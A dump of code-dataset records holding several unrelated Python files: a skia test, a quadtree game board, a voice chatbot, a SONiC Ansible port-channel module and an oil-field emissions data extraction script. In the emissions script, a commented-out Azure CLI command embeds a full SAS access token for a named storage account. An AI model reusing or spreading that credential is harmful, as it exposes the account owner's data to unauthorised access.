print_warning_if_version_outdated()\n execute_for_args({\n 'init': run_init,\n 'default': run_engine\n }, online)\n if online:\n print_warning_if_version_outdated()\n\n\ndef run_engine(args, online: bool):\n if online:\n engine_statistics(args.no_statistics)\n\n if args.resources:\n prepend_resource_dir(args)\n\n controller = MainController()\n asyncio.run(controller.run(args, online))\n\n\ndef run_init(args, _):\n prepare_workspace(args)\n\n\nif __name__ == \"__main__\":\n multiprocessing.freeze_support()\n if not is_verbosity(verbosity=\"debug\"):\n optuna.logging.set_verbosity(optuna.logging.WARNING)\n connection_status = check_internet_connection()\n start_time = perf_counter()\n main(connection_status)\n end_time = perf_counter()\n print_debug(f\"Elapsed time: {end_time - start_time}s\")\n","repo_name":"dema-trading-ai/engine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"51"} +{"seq_id":"29135910359","text":"import skia\nimport pytest\n\n\ndef draw(canvas):\n from math import cos, sin\n scale = 256.\n R = 0.45 * scale\n TAU = 6.2831853\n\n path = skia.Path()\n path.moveTo(R, 0.)\n for i in range(7):\n theta = 3 * i * TAU / 7\n path.lineTo(R * cos(theta), R * sin(theta))\n path.close()\n\n paint = skia.Paint()\n paint.setAntiAlias(True)\n\n canvas.clear(0xFFFFFFFF)\n canvas.translate(0.5 * scale, 0.5 * scale)\n canvas.drawPath(path, paint)\n\n\ndef test_skia():\n surface = skia.Surface(256, 256)\n canvas = surface.getCanvas()\n draw(canvas)\n image = surface.makeImageSnapshot()\n data = image.encodeToData()\n encoded = bytes(data)\n","repo_name":"kyamagu/skia-python","sub_path":"tests/test_skia.py","file_name":"test_skia.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":202,"dataset":"github-code","pt":"51"} +{"seq_id":"37831313841","text":"import copy\nimport math\nimport numpy as np\nimport scipy.misc as smp\nimport random\n\n\n# if end when the whole space is split, the image is pretty much just noise, maybe end after a number of steps\n# generate probabilities from discriminator or network?\n\n# if width and height are 1s remove from possible nodes and add to archived nodes\n\ndef softmax(x):\n\tprobs = np.exp(x - np.max(x))\n\tprobs /= np.sum(probs)\n\treturn probs\n\n\nclass Board(object):\n\n\t# Board for the game\n\n\tdef __init__(self, width, height):\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.data = np.zeros((width,height), dtype=np.uint8)\n\t\t# self.act_probs = softmax(gradient)\n\t\tself.nodes = {(0,0): [width, height, False]} #last parameter means been inverted or not\n\t\t# self.n_unit_node = 0\n\n\tdef copy(self):\n\t\tc = Board(self.width, self.height)\n\t\tc.data = self.data.copy()\n\t\tc.nodes = self.nodes.copy()\n\t\treturn c\n\t\n\tdef update(self, action):\n\t\t# action is element from [0,1,2,3,4] 0 meaning invert whole square, 1 invert top left, 2 top right, 3 bottom left, 4 bottom right\n\t\tloc, loc_action = action\n\t\tx, y = loc\n\t\twidth, height, already_inverted = self.nodes[loc]\n\n\t\tif loc_action==0:\n\t\t\tx1, x2, y1, y2 = x, x+width, y, y+height\n\t\t\t# if width==1 or height==1:\n\t\t\t# \tself.nodes.pop((x1,y1), None)\n\t\t\t# else:\n\t\t\tself.nodes[(x1,y1)] = [width, height, True]\n\t\telse:\n\t\t\tif loc_action==1:\n\t\t\t\tx1, x2, y1, y2 = x, x+width//2, y, y+height//2\n\t\t\t\tself.nodes[(x2,y1)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x1,y2)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x2,y2)] = [width//2, height//2, False]\n\n\t\t\telif loc_action==2:\n\t\t\t\tx1, x2, y1, y2 = x+width//2, x+width, y, y+height//2\n\t\t\t\tself.nodes[(x,y1)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x,y2)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x1,y2)] = [width//2, height//2, False]\n\n\t\t\telif loc_action==3:\n\t\t\t\tx1, x2, y1, y2 = x, x+width//2, y+height//2, y+height\n\t\t\t\tself.nodes[(x1,y)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x2,y)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x2,y1)] = [width//2, height//2, False]\n\n\t\t\telse:\n\t\t\t\tx1, x2, y1, y2 = x+width//2, x+width, y+height//2, y+height\n\t\t\t\tself.nodes[(x,y1)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x,y)] = [width//2, height//2, False]\n\t\t\t\tself.nodes[(x1,y)] = [width//2, height//2, False]\n\n\t\t\tself.nodes[(x1,y1)] = [width//2, height//2, True]\n\n\n\t\tfor i in range(x1, x2):\n\t\t\tfor j in range(y1, y2):\n\t\t\t\tif self.data[i,j]==0:\n\t\t\t\t\tself.data[i,j] = 255\n\t\t\t\telse:\n\t\t\t\t\tself.data[i,j] = 0\n\n\tdef get_actions(self, grad=None):\n\t\tactions = []\n\t\tfor loc, loc_v in self.nodes.items():\n\t\t\twidth, height, already_inverted = loc_v\n\t\t\tif not already_inverted:\n\t\t\t\tactions.append((loc, 0))\n\t\t\tif width > 1 and height > 1:\n\t\t\t\tfor i in range(1,5):\n\t\t\t\t\tactions.append((loc, i))\n\t\tprob = 1/len(actions) if actions else 0\n\t\tactions = [(a, prob) for a in actions]\n\t\treturn actions\n\n\n\tdef update_random(self):\n\t\t# loc = random.sample(self.nodes.keys(),1)[0]\n\t\t# width, height, already_inverted = self.nodes[loc]\n\t\t# if already_inverted:\n\t\t# \tloc_action = random.randint(1,4)\n\t\t# elif width==1 or height==1:\n\t\t# \tloc_action = 0\n\t\t# else:\n\t\t# \tloc_action = random.randint(0,4)\n\t\tactions = self.get_actions()\n\t\tif True:\n\t\t\taction, prob = random.sample(actions, 1)[0]\n\t\t\tself.update(action)\n\n\n\tdef end(self):\n\t\tif len(self.nodes)>128:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef visualize(self):\n\t\tdata = self.data\n\t\twidth = self.width\n\t\theight = self.height\n\t\ttemp = np.zeros( (width,height,3), dtype=np.uint8 )\n\t\tfor i in range(width):\n\t\t\tfor j in range(height):\n\t\t\t\tfor k in range(3):\n\t\t\t\t\ttemp[i][j][k] = data[i][j]\n\t\timg = smp.toimage( temp )\n\t\timg.show()\n\n\n\t\n# size = 28\n# # gradient = np.random.choice([-1, 0, 1], size=(size,size))\n\n# image = Board(size, size)\n# for i in range(30):\n# \timage.start_play()\n# \tprint(len(image.nodes))\n\n# image.visualize()","repo_name":"mitchgu/MCTSGen","sub_path":"quadtree.py","file_name":"quadtree.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"20981003198","text":"# Una persona se encuentra en el kilómetro 70 de una carretera, otra se\r\n# encuentra en el km 150, los coches tienen sentido opuesto y tienen la misma velocidad.\r\n# Realizar un programa para determinar en qué kilómetro de esa carretera se encontrarán.\r\n\r\n# Variable que dice el km donde se encuentra el coche 1\r\ncoche1=70\r\n# Variable que dice el km donde se encuentra el coche 2\r\ncoche2=150\r\n# Mientras el km del 1 no es igual que el km del segundo\r\n# se le suma uno al coche 1, y se le resta 1 al coche 2,\r\n# de tal forma que cuando su km coincida lo diga\r\nwhile coche1!=coche2:\r\n coche1 += 1\r\n coche2 -= 1\r\nprint(\"Ambos coches se han encontrado en el km: \",coche2)","repo_name":"alber122/PYTHON_EIABD","sub_path":"B3/Ejer14.py","file_name":"Ejer14.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"16631792373","text":"import pyttsx3\nimport speech_recognition as sr\nimport random\n\n\"\"\" Python small chatbot for some college information\n eg questions:-\n 1. Hello\n 2. Who is HOD of Physics Department\n 3. Where is PPS Department \n\"\"\"\n\ndef sayText(text):\n tts = pyttsx3.init()\n tts.setProperty('rate', 150)\n tts.say(text)\n print(text + \"\\n\")\n tts.runAndWait()\n\n\ndef recognitionText():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n r.adjust_for_ambient_noise(source)\n r.pause_threshold = 1\n print(\"Listening...\")\n audio = r.listen(source)\n try:\n text = r.recognize_google(audio)\n print(text)\n return text\n except:\n sayText(\"Sorry I did'nt Understand...\")\n\n\ndef checker(text, find):\n for x in find:\n if text.__contains__(x):\n return x\n else:\n continue\n\n\nentering = ['hi', 'hello there', 'hello', 'hey', 'hey', 'hai']\nexiting = ['okay thanks', 'bye', 'good day', 'thanks']\nsecondary = ['Physics', 'physics', 'chemistry',\n 'Chemistry', 'pps', 'PPS', 'Maths', 'maths']\nmain = ['HOD', 'department', 'Department']\n\n\nwhile True:\n text = recognitionText()\n\n checkerMain = checker(text, main)\n checkerSecondary = checker(text, secondary)\n\n if text in entering:\n sayText(random.choice(entering))\n\n elif checkerMain == 'department' or checkerMain == 'Department':\n\n if checkerSecondary == 'Physics' or checkerSecondary == 'physics':\n sayText('Physics Department is in A Block')\n elif checkerSecondary == 'chemistry':\n sayText('Chemistry Department is in D Block')\n elif checkerSecondary == 'maths' or checkerSecondary == 'Maths':\n sayText('Maths Department is in B Block')\n elif checkerSecondary == 'pps' or checkerSecondary == 'PPS':\n sayText('PPS Department is in C Block')\n else:\n sayText('I don\\'t know the answer...exiting')\n break\n\n elif checkerMain == 'HOD':\n\n if checkerSecondary == 'Physics' or checkerSecondary == 'physics':\n sayText('Ram is HOD of physics department')\n elif checkerSecondary == 'chemistry' or checkerSecondary == 'Chemistry':\n sayText('Sita is HOD of chemistry department')\n elif checkerSecondary == 'maths' or checkerSecondary == 'Maths':\n sayText('Kailash is HOD of maths department')\n elif checkerSecondary == 'pps' or checkerSecondary == 'PPS':\n sayText('Kavita is HOD of PPS department')\n else:\n sayText('I don\\'t know the answer...exiting')\n break\n\n elif text in exiting:\n sayText(random.choice(exiting))\n break\n \n else:\n sayText('I don\\'t know the answer...exiting')\n break","repo_name":"Stargent-Robotics-Community/Prateek-Singh","sub_path":"Assignment-chatbot/chatbot.py","file_name":"chatbot.py","file_ext":"py","file_size_in_byte":2795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"3903785764","text":"#!/usr/bin/env python\n\nfrom ansible.module_utils.basic import AnsibleModule\nimport jinja2\nimport traceback\nimport re\nimport os\nimport time\nDOCUMENTATION = '''\nmodule: ptf_portchannel\n\nshort_description: manage portchannel interface in PTF container\ndescription: start/stop portchannel interface in PTF container with certain configurations\n\nOptions:\n - option-name: cmd\n description: An action string as [start|stop]\n required: True\n - option-name: portchannel_config\n description: A dict to indicate the portchannel configuration. E.G. {\"PortChannel101\": {\"intfs\": [0, 4]}}\n required: True\n'''\n\n\nEXAMPLES = '''\n- name: Start PTF portchannel\n ptf_portchannel:\n cmd: \"start\"\n portchannel_config: \"{{ portchannel_config }}\"\n'''\n\n\nportchannel_conf_path = \"/etc/portchannel\"\n\n\nportchannel_conf_tmpl = '''\\\n{\n \"device\": \"{{ name }}\",\n \"runner\": {\n \"active\": true,\n \"name\": \"lacp\",\n \"min_ports\": 1\n },\n \"ports\": {\n{%- for intf in intfs %}\n \"{{ intf }}\": {}{{ \",\" if not loop.last else \"\" }}\n{%- endfor %}\n }\n}\n'''\n\n\nportchannel_supervisord_path = \"/etc/supervisor/conf.d\"\n\n\nportchannel_supervisord_conf_tmpl = '''\\\n[program:portchannel-{{ name }}]\ncommand=/usr/bin/teamd -r -t {{ name }} -f ''' + portchannel_conf_path + '''/{{ name }}.conf\nstdout_logfile=/tmp/portchannel-{{ name }}.out.log\nstderr_logfile=/tmp/portchannel-{{ name }}.err.log\nredirect_stderr=false\nautostart=true\nautorestart=true\nstartsecs=1\nnumprocs=1\n'''\n\n\ndef exec_command(module, cmd, ignore_error=False, msg=\"executing command\"):\n rc, out, err = module.run_command(cmd)\n if not ignore_error and rc != 0:\n module.fail_json(msg=\"Failed %s: rc=%d, out=%s, err=%s\" %\n (msg, rc, out, err))\n return out\n\n\ndef get_portchannel_status(module, name):\n output = exec_command(\n module, cmd=\"supervisorctl status portchannel-%s\" % name)\n m = re.search(r'^([\\w|-]*)\\s+(\\w*).*$', output.decode(\"utf-8\"))\n return m.group(2)\n\n\ndef refresh_supervisord(module):\n exec_command(module, cmd=\"supervisorctl reread\", ignore_error=True)\n exec_command(module, cmd=\"supervisorctl update\", ignore_error=True)\n\n\ndef parse_teamd_config(module, portchannel_config):\n conf = []\n for name, intfs in portchannel_config.items():\n intfs_names = []\n if not intfs[\"intfs\"]:\n continue\n for intf in intfs[\"intfs\"]:\n intfs_names.append(\"eth\" + str(intf))\n conf.append({\"name\": name, \"intfs\": intfs_names})\n return conf\n\n\ndef create_teamd_conf(module, teamd_config):\n t = jinja2.Template(portchannel_conf_tmpl)\n for conf in teamd_config:\n with open(os.path.join(portchannel_conf_path, \"{}.conf\".format(conf[\"name\"])), 'w') as fd:\n fd.write(t.render(conf))\n\n\ndef remove_teamd_conf(module, teamd_config):\n for conf in teamd_config:\n try:\n os.remove(os.path.join(portchannel_conf_path,\n \"{}.conf\".format(conf[\"name\"])))\n except Exception:\n pass\n\n\ndef create_supervisor_conf(module, teamd_config):\n t = jinja2.Template(portchannel_supervisord_conf_tmpl)\n for conf in teamd_config:\n with open(os.path.join(portchannel_supervisord_path, \"portchannel-{}.conf\".format(conf[\"name\"])), 'w') as fd:\n fd.write(t.render(conf))\n refresh_supervisord(module)\n\n\ndef remove_supervisor_conf(module, teamd_config):\n for conf in teamd_config:\n try:\n os.remove(os.path.join(portchannel_supervisord_path,\n \"portchannel-{}.conf\".format(conf[\"name\"])))\n except Exception:\n pass\n refresh_supervisord(module)\n\n\ndef enable_portchannel(module, teamd_config):\n for conf in teamd_config:\n for intf in conf[\"intfs\"]:\n exec_command(module, \"ip link set dev {} down\".format(intf))\n exec_command(\n module, \"supervisorctl start portchannel-{}\".format(conf[\"name\"]))\n for count in range(0, 60):\n time.sleep(1)\n status = get_portchannel_status(module, conf[\"name\"])\n if u'RUNNING' == status:\n break\n assert u'RUNNING' == status\n exec_command(module, \"ip link set dev {} up\".format(conf[\"name\"]))\n\n\ndef disable_portchannel(module, teamd_config):\n for conf in teamd_config:\n exec_command(\n module, cmd=\"supervisorctl stop portchannel-{}\".format(conf[\"name\"]), ignore_error=True)\n\n\ndef setup_portchannel_conf():\n try:\n os.mkdir(portchannel_conf_path, 0o755)\n except OSError:\n pass\n\n\ndef main():\n module = AnsibleModule(\n argument_spec=dict(\n cmd=dict(required=True, choices=['start', 'stop'], type='str'),\n portchannel_config=dict(required=True, type='dict'),\n ),\n supports_check_mode=False)\n cmd = module.params['cmd']\n portchannel_config = module.params['portchannel_config']\n teamd_config = parse_teamd_config(module, portchannel_config)\n\n setup_portchannel_conf()\n\n try:\n if cmd == 'start':\n create_teamd_conf(module, teamd_config)\n create_supervisor_conf(module, teamd_config)\n enable_portchannel(module, teamd_config)\n elif cmd == 'stop':\n disable_portchannel(module, teamd_config)\n remove_supervisor_conf(module, teamd_config)\n remove_teamd_conf(module, teamd_config)\n except Exception:\n module.fail_json(msg=traceback.format_exc())\n\n module.exit_json()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sonic-net/sonic-mgmt","sub_path":"ansible/library/ptf_portchannel.py","file_name":"ptf_portchannel.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"51"} +{"seq_id":"27174316752","text":"import pandas as pd\nimport numpy as np\nimport os\n\n# Load all csvs files into csvs folder\n#os.system(\"az storage blob download-batch --destination '../Upstream/csvs' --source csvs --sas-token '?sv=2020-08-04&ss=bfqt&srt=sco&sp=rl&se=2022-10-14T03:32:20Z&st=2021-10-13T19:32:20Z&spr=https&sig=WL8KGvOgEve5iluhVafKP0MMMkkBOPmluV3%2B8LGAFb8%3D' --account-name ocirmistorage\")\n\n# Extracting Data from csvs folder \n# Get the directory of all csv files\nd = '../Upstream/csvs/'\ndirectory = os.fsencode('../Upstream/csvs')\nlist_csv =[]\nfor file in os.listdir(directory):\n filename = os.fsdecode(file)\n if filename.endswith('.csv') and filename.startswith('2') and 'Gas_nofrack_nolng.xlsm-Gannet A' not in filename: \n #print(filename)\n list_csv.append(filename)\n continue\n else:\n continue\n\nprint('Extract data needed from all results.csv files...')\n\nlist_results = []\nfor filename in list_csv:\n if filename.endswith('Results.csv'):\n list_results.append(filename)\n\ncolumn_names = [ \n'Downhole pump',\n 'Water reinjection ',\n 'Natural gas reinjection',\n 'Water flooding',\n 'Gas lifting',\n 'Gas flooding',\n 'Steam flooding',\n 'Oil sands mine (integrated with upgrader)',\n 'Oil sands mine (non-integrated with upgrader)',\n 'Field location (Country)',\n 'Field_name',\n 'Field age',\n 'Field depth',\n 'Oil production volume',\n 'Number of producing wells',\n 'Number of water injecting wells',\n 'Production tubing diameter',\n 'Productivity index',\n 'Reservoir pressure',\n 'Reservoir temperature',\n 'Offshore?',\n 'API gravity',\n 'Gas composition N2',\n 'Gas composition CO2',\n 'Gas composition C1',\n 'Gas composition C2',\n 'Gas composition C3',\n 'Gas composition C4+',\n 'Gas composition H2S',\n 'Gas-to-oil ratio (GOR)',\n 'Water-to-oil ratio (WOR)',\n 'Water injection ratio',\n 'Gas lifting injection ratio',\n 'Gas flooding injection ratio',\n 'Flood gas ',\n 'Liquids unloading practice',\n 'Fraction of CO2 breaking through to producers',\n 'Source of makeup CO2',\n 'Percentage of sequestration credit assigned to the oilfield',\n 'Steam-to-oil ratio (SOR)',\n 'Fraction of required electricity generated onsite',\n 'Fraction of remaining natural gas reinjected',\n 'Fraction of produced water reinjected',\n 'Fraction of steam generation via cogeneration ',\n 'Fraction of steam generation via solar thermal',\n 'Heater/treater',\n 'Stabilizer column',\n 'Upgrader type',\n 'Associated Gas Processing Path',\n 'Flaring-to-oil ratio',\n 'Venting-to-oil ratio (purposeful)',\n 'Volume fraction of diluent',\n 'Low carbon richness (semi-arid grasslands)',\n 'Moderate carbon richness (mixed)',\n 'High carbon richness (forested)',\n 'Low intensity development and low oxidation',\n 'Moderate intensity development and moderate oxidation',\n 'High intensity development and high oxidation',\n 'Ocean tanker',\n 'Barge',\n 'Pipeline',\n 'Rail',\n 'Truck',\n 'Transport distance (one way) - Ocean tanker',\n 'Transport distance (one way) - Barge',\n 'Transport distance (one way) - Pipeline',\n 'Transport distance (one way) - Rail',\n 'Transport distance (one way) - Truck',\n 'Ocean tanker size, if applicable',\n 'Small sources emissions',\n 'e-Total energy consumption','e-Total GHG emissions', \n 'e-Total GHG emissions-Combustion/land use','e-Total GHG emissions-VFF',\n 'd-Total energy consumption','d-Total GHG emissions', \n 'd-Total GHG emissions-Combustion/land use','d-Total GHG emissions-VFF',\n 'p-Total energy consumption','p-Total GHG emissions', \n 'p-Total GHG emissions-Combustion/land use','p-Total GHG emissions-VFF',\n 's-Total energy consumption','s-Total GHG emissions', \n 's-Total GHG emissions-Combustion/land use','s-Total GHG emissions-VFF',\n 'l-Total energy consumption','l-Total GHG emissions', \n 'l-Total GHG emissions-Combustion/land use','l-Total GHG emissions-VFF',\n 'm-Total energy consumption','m-Total GHG emissions', \n 'm-Total GHG emissions-Combustion/land use','m-Total GHG emissions-VFF',\n 'w-Total energy consumption','w-Total GHG emissions', \n 'w-Total GHG emissions-Combustion/land use','w-Total GHG emissions-VFF',\n 't-Total energy consumption','t-Total GHG emissions', \n 't-Total GHG emissions-Combustion/land use','t-Total GHG emissions-VFF','t-Loss factor',\n 'g-Total energy consumption','g-Total GHG emissions', \n 'g-Total GHG emissions-Combustion/land use','g-Total GHG emissions-VFF',\n 'Other small sources','Offsite emissions credit/debit','Lifecycle energy consumption',\n 'CSS-Total CO2 sequestered','Lifecycle GHG emissions','Field-by-field check']\n\n# function to extract results from one csv an store in a dataframe\ndef clean_df(df,column_names):\n '''clean the df and transpose to map the column names'''\n df = df.iloc[: , 7:]\n df = df.iloc[[8,9,10,11,12,13,14,15,16,19,20,21,22,23,24,25,26,27,28,29,30,33,35,36,37,38,39,40,41,45,46,47,48,49,\n 50,54,57,58,61,62,63,64,65,66,67,69,70,71,76,85,86,87,91,92,93,95,96,97,101,102,103,104,105,107,108,109,110,\n 111,112,114,129,130,131,132,135,136,137,138,141,142,143,144,147,148,149,150,153,154,155,156,159,160,161,162,\n 165,166,167,168,171,172,173,174,175,178,179,180,181,183,185,187,190,192,194]]\n df_t = df.transpose()\n df_t.columns = column_names\n df_t = df_t.dropna(how = 'all')\n return df_t\n\nlist_df =[]\nfor file in list_results:\n try:\n df = pd.read_csv(d+file,header = None) \n result = clean_df(df,column_names)\n result['original_file']=file.split('-')[0]\n result['year']=file.split('-')[0][:-5].split('_')[0]\n result['field_type']=file.split('-')[0][:-5].split('_')[1].lower()\n result['frack?']= True if file.split('-')[0][:-5].split('_')[2].lower()=='frack' else False\n result['lng?']= True if file.split('-')[0][:-5].split('_')[3].lower()=='lng' else False\n result['Field_name'] = ('-'.join(file.split('-')[1:-1])).strip()\n list_df.append(result)\n except:\n print(\"problematic files\" + d+file)\n\nresults_df = pd.concat(list_df)\n\n\n# Converting all numerical columns into float type\n\nnumerical_columns = [\n 'Field age',\n 'Field depth',\n 'Oil production volume',\n 'Number of producing wells',\n 'Number of water injecting wells',\n 'Production tubing diameter',\n 'Productivity index',\n 'Reservoir pressure',\n 'Reservoir temperature',\n 'Offshore?',\n 'API gravity',\n 'Gas composition N2',\n 'Gas composition CO2',\n 'Gas composition C1',\n 'Gas composition C2',\n 'Gas composition C3',\n 'Gas composition C4+',\n 'Gas composition H2S',\n 'Gas-to-oil ratio (GOR)',\n 'Water-to-oil ratio (WOR)',\n 'Water injection ratio',\n 'Gas lifting injection ratio',\n 'Gas flooding injection ratio',\n 'Flood gas ',\n 'Liquids unloading practice',\n 'Fraction of CO2 breaking through to producers',\n 'Source of makeup CO2',\n 'Percentage of sequestration credit assigned to the oilfield',\n 'Steam-to-oil ratio (SOR)',\n 'Fraction of required electricity generated onsite',\n 'Fraction of remaining natural gas reinjected',\n 'Fraction of produced water reinjected',\n 'Fraction of steam generation via cogeneration ',\n 'Fraction of steam generation via solar thermal',\n 'Heater/treater',\n 'Stabilizer column',\n 'Upgrader type',\n 'Associated Gas Processing Path',\n 'Flaring-to-oil ratio',\n 'Venting-to-oil ratio (purposeful)',\n 'Volume fraction of diluent',\n 'Low carbon richness (semi-arid grasslands)',\n 'Moderate carbon richness (mixed)',\n 'High carbon richness (forested)',\n 'Low intensity development and low oxidation',\n 'Moderate intensity development and moderate oxidation',\n 'High intensity development and high oxidation',\n 'Ocean tanker',\n 'Barge',\n 'Pipeline',\n 'Rail',\n 'Truck',\n 'Transport distance (one way) - Ocean tanker',\n 'Transport distance (one way) - Barge',\n 'Transport distance (one way) - Pipeline',\n 'Transport distance (one way) - Rail',\n 'Transport distance (one way) - Truck',\n 'Ocean tanker size, if applicable',\n 'Small sources emissions',\n 'e-Total energy consumption',\n 'e-Total GHG emissions',\n 'e-Total GHG emissions-Combustion/land use',\n 'e-Total GHG emissions-VFF',\n 'd-Total energy consumption',\n 'd-Total GHG emissions',\n 'd-Total GHG emissions-Combustion/land use',\n 'd-Total GHG emissions-VFF',\n 'p-Total energy consumption',\n 'p-Total GHG emissions',\n 'p-Total GHG emissions-Combustion/land use',\n 'p-Total GHG emissions-VFF',\n 's-Total energy consumption',\n 's-Total GHG emissions',\n 's-Total GHG emissions-Combustion/land use',\n 's-Total GHG emissions-VFF',\n 'l-Total energy consumption',\n 'l-Total GHG emissions',\n 'l-Total GHG emissions-Combustion/land use',\n 'l-Total GHG emissions-VFF',\n 'm-Total energy consumption',\n 'm-Total GHG emissions',\n 'm-Total GHG emissions-Combustion/land use',\n 'm-Total GHG emissions-VFF',\n 'w-Total energy consumption',\n 'w-Total GHG emissions',\n 'w-Total GHG emissions-Combustion/land use',\n 'w-Total GHG emissions-VFF',\n 't-Total energy consumption',\n 't-Total GHG emissions',\n 't-Total GHG emissions-Combustion/land use',\n 't-Total GHG emissions-VFF',\n 't-Loss factor',\n 'g-Total energy consumption',\n 'g-Total GHG emissions',\n 'g-Total GHG emissions-Combustion/land use',\n 'g-Total GHG emissions-VFF',\n 'Other small sources',\n 'Offsite emissions credit/debit',\n 'Lifecycle energy consumption',\n 'CSS-Total CO2 sequestered',\n 'Lifecycle GHG emissions']\n\nresults_df = results_df.replace(r'^\\s+$', np.nan, regex=True)\n\nresults_df = results_df.replace(r'\\\\', np.nan, regex=True)\n\nresults_df.reset_index(inplace = True)\n\nresults_df.drop(columns = 'index',inplace = True)\n\nresults_df[numerical_columns]= results_df[numerical_columns].astype(float)\n\nresults_df['Field_name']=results_df['Field_name'].apply(lambda x: x.strip())\n\nprint('Extract data needed from all energy summary.csv files...')\n\nlist_energy_summary = []\nfor filename in list_csv:\n if filename.endswith('Energy Summary.csv'):\n list_energy_summary.append(filename)\n\nES_MJperd =[]\nES_mmbtuperd = []\nES_Energy_Density_crude_oil = []\nES_Energy_Density_petcoke = []\nES_Energy_Density_C2 = []\nES_Energy_Density_C3 = []\nES_Energy_Density_C4 = []\nES_Crude_output = []\nES_Gas_output = []\nES_NGL_output = []\nES_Gas_output_MJ = []\nES_Petcoke_fuel =[]\nField_name = []\noriginal_file = []\n\nfor file in list_energy_summary:\n df = pd.read_csv(d+file,header=None)\n ES_MJperd.append(float(df.iloc[127,5]))\n ES_mmbtuperd.append(float(df.iloc[127,4]))\n ES_Energy_Density_crude_oil.append(float(df.iloc[132,12]))\n ES_Energy_Density_petcoke.append(float(df.iloc[134,12]))\n ES_Energy_Density_C2.append(float(df.iloc[140,12]))\n ES_Energy_Density_C3.append(float(df.iloc[141,12]))\n ES_Energy_Density_C4.append(float(df.iloc[142,12]))\n \n ES_Crude_output.append(float(df.iloc[88,4]))\n ES_Gas_output.append(float(df.iloc[84,4]))\n \n if df.iloc[120,3] == 'Gas':\n ES_Gas_output_MJ.append(float(df.iloc[120,5]))\n else:\n ES_Gas_output_MJ.append(float(df.iloc[123,5]))\n \n ES_NGL_output.append(float(df.iloc[86,4]))\n ES_Petcoke_fuel.append(float(df.iloc[76,4]))\n Field_name.append(('-'.join(file.split('-')[1:-1])).strip())\n #Field_name.append(df.iloc[0,7].strip())\n original_file.append(file.split('-')[0])\n\nenergy_summary = pd.DataFrame({'Field_name':Field_name,'original_file':original_file,\n 'ES_MJperd':ES_MJperd,'ES_mmbtuperd':ES_mmbtuperd,\n 'ES_Energy_Density_crude(mmbtu/t)':ES_Energy_Density_crude_oil,'ES_Energy_Density_petcoke(mmbtu/t)':ES_Energy_Density_petcoke,\n 'ES_Energy_Density_C2(mmbtu/t)':ES_Energy_Density_C2,'ES_Energy_Density_C3(mmbtu/t)':ES_Energy_Density_C3,\n 'ES_Energy_Density_C4(mmbtu/t)':ES_Energy_Density_C4, 'ES_Crude_output(mmbut/d)':ES_Crude_output,\n 'ES_Gas_output(mmbtu/d)':ES_Gas_output, 'ES_NGL_output(mmbtu/d)':ES_NGL_output,\n 'ES_Gas_output(MJ/d)':ES_Gas_output_MJ,'ES_Petcoke_fuel(mmbtu/d)':ES_Petcoke_fuel})\n\n\nresults_ES = results_df.merge(energy_summary,how='outer',indicator = True)\n\nif results_ES[results_ES['_merge']!='both'].shape[0]>0:\n print('Unmatched Field: Results // Energy Summary. Check the merge')\n print(results_ES[results_ES['_merge']!='both'])\n results_ES.drop(columns = '_merge',inplace = True)\nelse:\n results_ES.drop(columns = '_merge',inplace = True)\n\n\n\nresults_ES['tCO2e/yr']=results_ES['Lifecycle GHG emissions']*\\\n results_ES['ES_MJperd']/10**6*365\n\nprint('Extract methane emission from flaring.csv files...')\n\nlist_flaring=[]\nfor filename in list_csv:\n if filename.endswith('Flaring.csv'):\n list_flaring.append(filename)\n\nflaring_ch4 =[]\nField_name = []\noriginal_file = []\n\nfor file in list_flaring:\n df = pd.read_csv(d+file,header=None)\n flaring_ch4.append(float(df.iloc[80,12]))\n Field_name.append(('-'.join(file.split('-')[1:-1])).strip())\n original_file.append((file.split('-')[0]))\n\nflaring = pd.DataFrame({'flaring_ch4(t/d)':flaring_ch4,'Field_name':Field_name,'original_file':original_file})\n\nprint('Extract co2 and methane emission from vff summary.csv files...')\n\nlist_vff=[]\nfor filename in list_csv:\n if filename.endswith('VFF Summary.csv'):\n list_vff.append(filename)\n\nventing_ch4 =[]\n\nventing_ch4_miq = []\nventing_ch4_uponly = []\n\nfugitive_ch4 =[]\n\nfugitive_ch4_miq = []\nfugitive_ch4_uponly = []\nventing_production_ch4 = []\nventing_gatherboostprocesss_ch4 = []\nventing_transmissionstorage_ch4 = []\nventing_2ndproduction_ch4 = []\nfugitive_production_ch4 = []\nfugitive_gatherboostprocesss_ch4 = []\nfugitive_transmissionstorage_ch4 =[]\nfugitive_2ndproduction_ch4 = []\n\n\n\nventing_co2 = []\nfugitive_co2 = []\nField_name = []\noriginal_file = []\nfor file in list_vff:\n df = pd.read_csv(d+file,header=None)\n venting_ch4.append(sum(df.iloc[111:157,9].apply(lambda x:float(x))))\n fugitive_ch4.append(sum(df.iloc[111:157,10].apply(lambda x:float(x))))\n venting_co2.append(sum(df.iloc[111:157,7].apply(lambda x:float(x))))\n fugitive_co2.append(sum(df.iloc[111:157,8].apply(lambda x:float(x))))\n \n venting_production_ch4.append(sum(df.iloc[111:131,9].apply(lambda x:float(x))))\n venting_gatherboostprocesss_ch4.append(sum(df.iloc[131:136,9].apply(lambda x:float(x))))\n venting_transmissionstorage_ch4.append(sum(df.iloc[136:141,9].apply(lambda x:float(x))))\n venting_2ndproduction_ch4.append(sum(df.iloc[147:157,9].apply(lambda x:float(x))))\n \n 